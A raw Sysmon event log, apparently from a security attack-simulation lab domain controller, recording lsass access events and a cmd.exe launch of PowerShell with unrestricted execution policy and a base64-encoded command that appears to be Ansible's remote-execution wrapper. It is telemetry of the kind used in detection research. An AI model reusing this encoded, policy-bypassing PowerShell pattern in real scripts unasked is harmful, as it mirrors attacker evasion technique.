EEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8587-5FCF-624B-070000000000}0x74b620HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8587-5FCF-C200-000000009101}4312C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003872Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003871Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8587-5FCF-C100-000000009101}46044492C:\Windows\system32\conhost.exe{10ACEC4A-8587-5FCF-C200-000000009101}4312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003870Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003869Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003868Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003867Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003866Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003865Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003864Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003863Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003862Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8587-5FCF-C200-000000009101}4312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003861Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003860Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8587-5FCF-C000-000000009101}45964292C:\Windows\system32\WinrsHost.exe{10ACEC4A-8587-5FCF-C200-000000009101}4312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000003859Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.160{10ACEC4A-8587-5FCF-C200-000000009101}4312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBA